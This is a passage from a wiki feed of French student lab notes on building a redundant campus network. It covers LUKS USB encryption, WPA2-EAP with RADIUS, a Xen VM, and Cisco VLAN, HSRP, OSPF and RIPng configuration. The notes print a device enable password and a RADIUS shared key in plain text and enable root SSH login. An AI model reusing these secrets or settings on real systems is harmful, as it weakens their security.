 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
 root@zabethX:~# minicom -os // Sur l'ordinateur avec la clé Wifi&lt;br /&gt;
&lt;br /&gt;
Il faut changer quelques propriétés : &lt;br /&gt;
* concernant le port : /dev/ttyUSB0, &lt;br /&gt;
* 9600 bauds&lt;br /&gt;
* Désactiver le control de flux&lt;br /&gt;
&lt;br /&gt;
Pour passer en super utilisateur : &lt;br /&gt;
 ap&amp;gt; enable &lt;br /&gt;
Il faut entrer le mot de passe :&amp;quot;Cisco&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Concernant la configuration: &lt;br /&gt;
 ap#&amp;gt; config term&lt;br /&gt;
 ap(config)#&amp;gt; aaa new-model &lt;br /&gt;
 ap(config)#&amp;gt; aaa authentication login eap_group2 group radius_group2&lt;br /&gt;
 ap(config)#&amp;gt; aaa group server radius radius_group2&lt;br /&gt;
 ap(config)#&amp;gt; radius-server host 193.48.57.178 auth-port 1812 acct-port 1813 key secretIMA5SC&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Création des SSID, protégé par la méthode WPA2-EAP :&lt;br /&gt;
&lt;br /&gt;
 ap(config)#&amp;gt; dot11 ssid Mycoplasma&lt;br /&gt;
    ap(config-ssid)# vlan 102&lt;br /&gt;
    ap(config-ssid)# authentication open eap eap_group2&lt;br /&gt;
    ap(config-ssid)# authentication network-eap eap_group2&lt;br /&gt;
    ap(config-ssid)# authentication key-management wpa&lt;br /&gt;
    ap(config-ssid)#mbssid Guest-mode&lt;br /&gt;
&lt;br /&gt;
 ap(config)#int dot11radio0&lt;br /&gt;
   ap(config-if)#mbssid&lt;br /&gt;
   ap(config-if)#encryption vlan 102 mode ciphers aes-ccm tkip&lt;br /&gt;
   ap(config-if)#ssid &lt;br /&gt;
&lt;br /&gt;
 ap(config)#int dot11radio0.2&lt;br /&gt;
   ap(config-subif)#encapsulation dot1Q 102&lt;br /&gt;
   ap(config-subif)#bridge-group 102&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52110</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52110"/>
				<updated>2020-01-26T22:32:54Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* Playbooks */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
* '''SSH'''&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain se rapproche de la notion de domaine de diffusion voire VLAN avec des options plus poussés pour le filtrage et le forwarding [https://www.cisco.com/c/en/us/td/docs/routers/asr1000/configuration/guide/chassis/bdi.html  plus]. Pour permettre à notre routeur d'avoir une interface sur un bridge domaine on doit lui configurer une interface logique appelée BDI (Bridge Domain Interface) .Un routeur peut avoir plusieurs Bridge Domaines mais un Bridge Domaine n'accepte qu'une seule BDI. &lt;br /&gt;
&lt;br /&gt;
On en profite aussi pour faire notre configuration HSRP (Hot standby router protocol) [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus] et IPv6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200, 300 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
